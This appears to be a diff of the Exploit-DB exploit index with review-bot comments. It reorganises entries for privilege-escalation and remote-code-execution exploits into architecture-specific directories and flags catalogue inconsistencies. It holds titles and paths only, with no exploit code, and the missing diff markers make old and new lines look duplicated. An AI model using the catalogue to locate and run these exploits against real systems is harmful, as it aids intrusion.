39310,platforms/windows/local/39310.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (2) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
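Review bot: 40360 ("MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation") has type local but port 3306, while every other local entry in this hunk carries port 0; either the port should be 0 for a local entry or the type should reflect the network-reachable component, so confirm which is intended.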
@ -8597,7 +8597,7 @@ id,file,description,date,author,platform,type,port
39764,platforms/linux/local/39764.py,"TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow",2016-05-04,"Juan Sacco",linux,local,0
39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
39771,platforms/linux/local/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow)",2016-05-04,"Google Security Research",linux,local,0
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation",2016-05-04,"Google Security Research",linux,local,0
39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - 'WebDAV' Privilege Escalation (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local,0
@ -8620,7 +8620,7 @@ id,file,description,date,author,platform,type,port
39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
39984,platforms/windows/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,windows,local,0
39984,platforms/win_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,win_x86-64,local,0
39992,platforms/linux/local/39992.txt,"Linux - ecryptfs and /proc/$pid/environ Privilege Escalation",2016-06-21,"Google Security Research",linux,local,0
40017,platforms/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Buffer Overflow SEH Exploit",2016-06-27,"Sibusiso Sishi",windows,local,0
40018,platforms/windows/local/40018.py,"VUPlayer 2.49 - '.m3u' Buffer Overflow (Win 7 DEP Bypass)",2016-06-27,secfigo,windows,local,0
@ -8630,7 +8630,7 @@ id,file,description,date,author,platform,type,port
40039,platforms/win_x86/local/40039.cpp,"Microsoft Windows 7 SP1 (x86) - Privilege Escalation (MS16-014)",2016-06-29,blomster81,win_x86,local,0
40040,platforms/windows/local/40040.txt,"Lenovo ThinkPad - System Management Mode Arbitrary Code Execution",2016-06-29,Cr4sh,windows,local,0
40043,platforms/windows/local/40043.py,"Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution",2016-06-29,"Rémi ROCHER",windows,local,0
40049,platforms/linux/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,linux,local,0
40049,platforms/lin_x86-64/local/40049.c,"Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) - Netfilter target_offset Out-of-Bounds Privilege Escalation",2016-07-03,vnik,lin_x86-64,local,0
40066,platforms/android/local/40066.txt,"Samsung Android JACK - Privilege Escalation",2016-07-06,"Google Security Research",android,local,0
40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0
40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0
@ -8647,7 +8647,7 @@ id,file,description,date,author,platform,type,port
40172,platforms/windows/local/40172.py,"VUPlayer 2.49 - '.pls' Stack Buffer Overflow (DEP Bypass)",2016-07-29,vportal,windows,local,0
40173,platforms/windows/local/40173.txt,"mySCADAPro 7 - Privilege Escalation",2016-07-29,"Karn Ganeshen",windows,local,0
40203,platforms/linux/local/40203.py,"zFTP Client 20061220 - 'Connection Name' Local Buffer Overflow",2016-08-05,"Juan Sacco",linux,local,0
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x32/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
40219,platforms/windows/local/40219.txt,"Microsoft Windows 7 (x86/x64) - Group Policy Privilege Escalation (MS16-072)",2016-08-08,"Nabeel Ahmed",windows,local,0
40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
40268,platforms/windows/local/40268.rb,"Microsoft Windows - Fileless UAC Protection Bypass Privilege Escalation (Metasploit)",2016-08-19,"Pablo González",windows,local,0
@ -8731,7 +8731,7 @@ id,file,description,date,author,platform,type,port
40789,platforms/linux/local/40789.txt,"Palo Alto Networks PanOS root_reboot - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
40807,platforms/windows/local/40807.txt,"Huawei UTPS - Unquoted Service Path Privilege Escalation",2016-11-22,"Dhruv Shah",windows,local,0
40810,platforms/linux/local/40810.c,"Linux Kernel 2.6.18 - 'move_pages()' Information Leak",2010-02-08,spender,linux,local,0
40811,platforms/linux/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,linux,local,0
40811,platforms/lin_x86-64/local/40811.c,"Linux Kernel 2.6.32-rc1 (x86-64) - Register Leak",2009-10-04,spender,lin_x86-64,local,0
40812,platforms/linux/local/40812.c,"Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe.c' Privilege Escalation",2013-12-16,spender,linux,local,0
40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
@ -8742,7 +8742,7 @@ id,file,description,date,author,platform,type,port
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
40871,platforms/lin_x86-64/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,lin_x86-64,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
40903,platforms/windows/local/40903.py,"10-Strike Network File Search Pro 2.3 - SEH Local Buffer Overflow",2016-12-10,malwrforensics,windows,local,0
@ -8759,7 +8759,7 @@ id,file,description,date,author,platform,type,port
40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
41020,platforms/win_x86-64/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,win_x86-64,local,0
41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
41076,platforms/linux/local/41076.py,"iSelect v1.4 - Local Buffer Overflow",2017-01-16,"Juan Sacco",linux,local,0
@ -8774,6 +8774,7 @@ id,file,description,date,author,platform,type,port
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
41196,platforms/linux/local/41196.txt,"Oracle VM VirtualBox < 5.0.32 / < 5.1.14 - Privilege Escalation (PoC)",2017-01-27,"Wolfgang Hotwagner",linux,local,0
41207,platforms/windows/local/41207.txt,"Viscosity 1.6.7 - Privilege Escalation",2017-01-31,"Kacper Szurek",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -8902,7 +8903,7 @@ id,file,description,date,author,platform,type,port
263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80
266,platforms/windows/remote/266.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80
268,platforms/windows/remote/268.c,"Microsoft Windows 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80
269,platforms/linux/remote/269.c,"BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution",2001-05-08,qitest1,linux,remote,21
269,platforms/lin_x86/remote/269.c,"BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution",2001-05-08,qitest1,lin_x86,remote,21
275,platforms/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
277,platforms/linux/remote/277.c,"BIND 8.2.x - 'TSIG' Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53
279,platforms/linux/remote/279.c,"BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53
@ -8927,7 +8928,7 @@ id,file,description,date,author,platform,type,port
315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0
316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0
340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143
346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux,remote,23
346,platforms/linux_sparc/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux_sparc,remote,23
347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0
348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21
349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
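Review bot: 346 moves to platforms/linux_sparc for an exploit titled "Solaris /bin/login (SPARC/x86)", so the new directory still says linux for a Solaris target, names only SPARC where the description lists both SPARC and x86, and uses a linux_sparc form where the other renames in this patch use lin_x86 / lin_x86-64; the catalogue already has a solaris platform directory (263 in the previous hunk, 33799 in the local section), which fits this entry better.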
@ -9165,7 +9166,7 @@ id,file,description,date,author,platform,type,port
1279,platforms/windows/remote/1279.pm,"Snort 2.4.2 - BackOrifice Remote Buffer Overflow (Metasploit)",2005-11-01,"Trirat Puttaraksa",windows,remote,0
1288,platforms/linux/remote/1288.pl,"Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind)",2005-11-02,xwings,linux,remote,0
1290,platforms/linux/remote/1290.pl,"gpsdrive 2.09 (PPC) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
1291,platforms/linux/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",linux,remote,0
1291,platforms/lin_x86/remote/1291.pl,"gpsdrive 2.09 (x86) - (friendsd2) Remote Format String",2005-11-04,"Kevin Finisterre",lin_x86,remote,0
1292,platforms/multiple/remote/1292.pm,"WzdFTPD 0.5.4 - (SITE) Remote Command Execution (Metasploit)",2005-11-04,"David Maciejak",multiple,remote,21
1295,platforms/linux/remote/1295.c,"linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution",2005-11-05,kingcope,linux,remote,21
1313,platforms/windows/remote/1313.c,"Snort 2.4.2 - Back Orifice Pre-Preprocessor Remote Exploit (3)",2005-11-11,xort,windows,remote,0
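Review bot: 1291 (gpsdrive 2.09 x86) moves to platforms/lin_x86 but its sibling 1290 (gpsdrive 2.09 PPC, same author, same date) stays at platforms/linux, which leaves the linux directory meaning "any architecture not yet split out"; if architecture-specific directories are the rule, the PPC entry needs one too, otherwise keep both under linux so the pair stays together.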
@ -9303,7 +9304,7 @@ id,file,description,date,author,platform,type,port
2651,platforms/windows/remote/2651.c,"MiniHTTPServer Web Forum & File Sharing Server 4.0 - Add User Exploit",2006-10-25,"Greg Linares",windows,remote,0
2657,platforms/windows/remote/2657.html,"Microsoft Internet Explorer 7 - Popup Address Bar Spoofing",2006-10-26,anonymous,windows,remote,0
2671,platforms/windows/remote/2671.pl,"Novell eDirectory 8.8 - NDS Server Remote Stack Overflow",2006-10-28,FistFuXXer,windows,remote,8028
2680,platforms/windows/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",windows,remote,80
2680,platforms/win_x86/remote/2680.pm,"PrivateWire Gateway 3.7 (Windows x86) - Remote Buffer Overflow (Metasploit)",2006-10-29,"Michael Thumann",win_x86,remote,80
2689,platforms/windows/remote/2689.c,"Novell eDirectory 9.0 - DHost Remote Buffer Overflow",2006-10-30,Expanders,windows,remote,0
2690,platforms/windows/remote/2690.c,"Easy File Sharing Web Server 4 - Remote Information Stealer Exploit",2006-10-30,"Greg Linares",windows,remote,80
2699,platforms/windows/remote/2699.c,"EFS Easy Address Book Web Server 1.2 - Remote File Stream Exploit",2006-11-01,"Greg Linares",windows,remote,0
@ -9419,7 +9420,7 @@ id,file,description,date,author,platform,type,port
3604,platforms/windows/remote/3604.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Remote Code Exploit",2007-03-29,Shirkdog,windows,remote,111
3609,platforms/linux/remote/3609.py,"Snort 2.6.1 (Linux) - DCE/RPC Preprocessor Remote Buffer Overflow",2007-03-30,"Winny Thomas",linux,remote,0
3610,platforms/windows/remote/3610.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow",2007-03-30,"Umesh Wanve",windows,remote,0
3615,platforms/linux/remote/3615.c,"dproxy-nexgen (Linux/x86) - Buffer Overflow",2007-03-30,mu-b,linux,remote,53
3615,platforms/lin_x86/remote/3615.c,"dproxy-nexgen (Linux x86) - Buffer Overflow",2007-03-30,mu-b,lin_x86,remote,53
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - Unauthenticated Remote Exploit",2007-03-31,muts,windows,remote,143
3627,platforms/windows/remote/3627.c,"IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow",2007-04-01,Heretic2,windows,remote,143
3634,platforms/windows/remote/3634.txt,"Microsoft Windows XP/Vista - Animated Cursor '.ani' Remote Overflow",2007-04-01,jamikazu,windows,remote,0
@ -9972,10 +9973,10 @@ id,file,description,date,author,platform,type,port
8569,platforms/linux/remote/8569.txt,"Adobe Reader 8.1.4/9.1 - GetAnnots() Remote Code Execution",2009-04-29,Arr1val,linux,remote,0
8570,platforms/linux/remote/8570.txt,"Adobe 8.1.4/9.1 - customDictionaryOpen() Code Execution",2009-04-29,Arr1val,linux,remote,0
8579,platforms/windows/remote/8579.html,"BaoFeng - ActiveX OnBeforeVideoDownload() Remote Buffer Overflow",2009-04-30,MITBOY,windows,remote,0
8613,platforms/windows/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0
8614,platforms/windows/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,windows,remote,0
8621,platforms/windows/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,windows,remote,0
8623,platforms/windows/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,windows,remote,0
8613,platforms/win_x86/remote/8613.py,"32bit FTP (09.04.24) - 'CWD Response' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote,0
8614,platforms/win_x86/remote/8614.py,"32bit FTP (09.04.24) - 'Banner' Remote Buffer Overflow",2009-05-05,His0k4,win_x86,remote,0
8621,platforms/win_x86/remote/8621.py,"32bit FTP (09.04.24) - 'CWD Response' Universal Overwrite (SEH)",2009-05-05,His0k4,win_x86,remote,0
8623,platforms/win_x86/remote/8623.rb,"32bit FTP - 'PASV' Reply Client Remote Overflow (Metasploit)",2009-05-07,His0k4,win_x86,remote,0
8651,platforms/windows/remote/8651.pl,"Mereo 1.8.0 - Arbitrary File Disclosure",2009-05-11,Cyber-Zone,windows,remote,0
8666,platforms/windows/remote/8666.txt,"Zervit Web Server 0.4 - Directory Traversal / Memory Corruption (PoC)",2009-05-13,"e.wiZz! & shinnai",windows,remote,0
8696,platforms/hardware/remote/8696.txt,"Multiple D-Link Products - Captcha Bypass",2009-05-15,"SourceSec Dev Team",hardware,remote,0
@ -10841,7 +10842,7 @@ id,file,description,date,author,platform,type,port
16711,platforms/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,windows,remote,0
16712,platforms/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,windows,remote,21
16713,platforms/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Command Buffer Overflow (Metasploit)",2011-02-23,Metasploit,windows,remote,0
16714,platforms/windows/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,2100
16714,platforms/win_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,win_x86,remote,2100
16715,platforms/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,21
16716,platforms/windows/remote/16716.rb,"Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16717,platforms/windows/remote/16717.rb,"Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@ -10865,12 +10866,12 @@ id,file,description,date,author,platform,type,port
16735,platforms/windows/remote/16735.rb,"NetTerm NetFTPD - USER Buffer Overflow (Metasploit)",2010-10-05,Metasploit,windows,remote,0
16736,platforms/windows/remote/16736.rb,"FTPShell 5.1 - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16737,platforms/windows/remote/16737.rb,"EasyFTP Server 1.7.0.11 - CWD Command Stack Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16738,platforms/windows/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16738,platforms/win_x86/remote/16738.rb,"AASync 2.2.1.0 (Windows x86) - Stack Buffer Overflow 'LIST' (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
16739,platforms/windows/remote/16739.rb,"Xftp FTP Client 3.0 - PWD Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,21
16740,platforms/windows/remote/16740.rb,"Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)",2010-11-12,Metasploit,windows,remote,21
16741,platforms/windows/remote/16741.rb,"Texas Imperial Software WFTPD 3.23 - SIZE Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
16742,platforms/windows/remote/16742.rb,"Easy File Sharing FTP Server 2.0 - PASS Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
16743,platforms/windows/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,0
16743,platforms/win_x86/remote/16743.rb,"32bit FTP Client - Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,win_x86,remote,0
16744,platforms/windows/remote/16744.rb,"Computer Associates License Client - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10203
16745,platforms/windows/remote/16745.rb,"Computer Associates License Server - GETCONFIG Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,10202
16746,platforms/windows/remote/16746.rb,"Sentinel LM - UDP Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,5093
@ -10904,16 +10905,16 @@ id,file,description,date,author,platform,type,port
16774,platforms/windows/remote/16774.rb,"HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0
16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0
16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,0
16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
16777,platforms/windows/remote/16777.rb,"Free Download Manager 2.5 Build 758 - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,windows,remote,18881
16779,platforms/windows/remote/16779.rb,"Now SMS/Mms Gateway - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8800
16780,platforms/cgi/remote/16780.rb,"HP OpenView Network Node Manager - Snmp.exe CGI Buffer Overflow (Metasploit)",2010-11-11,Metasploit,cgi,remote,0
16781,platforms/windows/remote/16781.rb,"MailEnable - Authorisation Header Buffer Overflow (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16782,platforms/windows/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,windows,remote,0
16782,platforms/win_x86/remote/16782.rb,"Apache (Windows x86) - Chunked Encoding (Metasploit)",2010-07-07,Metasploit,win_x86,remote,0
16783,platforms/win_x86/remote/16783.rb,"McAfee ePolicy Orchestrator / ProtectionPilot - Overflow Exploit (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
16784,platforms/multiple/remote/16784.rb,"Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)",2010-11-22,Metasploit,multiple,remote,80
16785,platforms/windows/remote/16785.rb,"Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,80
16786,platforms/windows/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,7144
16786,platforms/win_x86/remote/16786.rb,"PeerCast 0.1216 (Windows x86) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,7144
16787,platforms/windows/remote/16787.rb,"IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit)",2010-07-14,Metasploit,windows,remote,0
16789,platforms/multiple/remote/16789.rb,"Adobe RoboHelp Server 8 - Arbitrary File Upload / Execution (Metasploit)",2010-11-24,Metasploit,multiple,remote,8080
16791,platforms/windows/remote/16791.rb,"MaxDB WebDBM - GET Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,9999
@ -10950,7 +10951,7 @@ id,file,description,date,author,platform,type,port
16822,platforms/windows/remote/16822.rb,"TABS MailCarrier 2.51 - SMTP EHLO Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,25
16823,platforms/windows/remote/16823.rb,"Network Associates PGP KeyServer 7 - LDAP Buffer Overflow (Metasploit)",2010-11-14,Metasploit,windows,remote,389
16824,platforms/windows/remote/16824.rb,"IPSwitch IMail LDAP Daemon/Service - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,389
16825,platforms/windows/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0
16825,platforms/win_x86/remote/16825.rb,"CA CAM (Windows x86) - log_security() Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,win_x86,remote,0
16826,platforms/windows/remote/16826.rb,"Symantec Alert Management System Intel Alert Originator Service - Buffer Overflow (Metasploit)",2010-05-13,Metasploit,windows,remote,38292
16827,platforms/windows/remote/16827.rb,"Trend Micro ServerProtect 5.58 - Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
16828,platforms/windows/remote/16828.rb,"Trend Micro ServerProtect 5.58 - CreateBinding() Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
@ -10982,8 +10983,8 @@ id,file,description,date,author,platform,type,port
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 (Access Point) - apply.cgi Buffer Overflow (Metasploit)",2010-09-24,Metasploit,hardware,remote,0
16855,platforms/linux/remote/16855.rb,"PeerCast 0.1216 (Linux) - URL Handling Buffer Overflow (Metasploit)",2010-09-20,Metasploit,linux,remote,0
16859,platforms/linux/remote/16859.rb,"Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16860,platforms/linux/remote/16860.rb,"Samba 3.3.12 (Linux/x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,linux,remote,0
16861,platforms/linux/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,linux,remote,0
16860,platforms/lin_x86/remote/16860.rb,"Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit)",2010-09-04,Metasploit,lin_x86,remote,0
16861,platforms/lin_x86/remote/16861.rb,"Samba 2.2.8 (Linux x86) - 'trans2open' Overflow (Metasploit)",2010-07-14,Metasploit,lin_x86,remote,0
16862,platforms/hardware/remote/16862.rb,"Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,hardware,remote,0
16863,platforms/osx/remote/16863.rb,"AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit)",2010-09-20,Metasploit,osx,remote,0
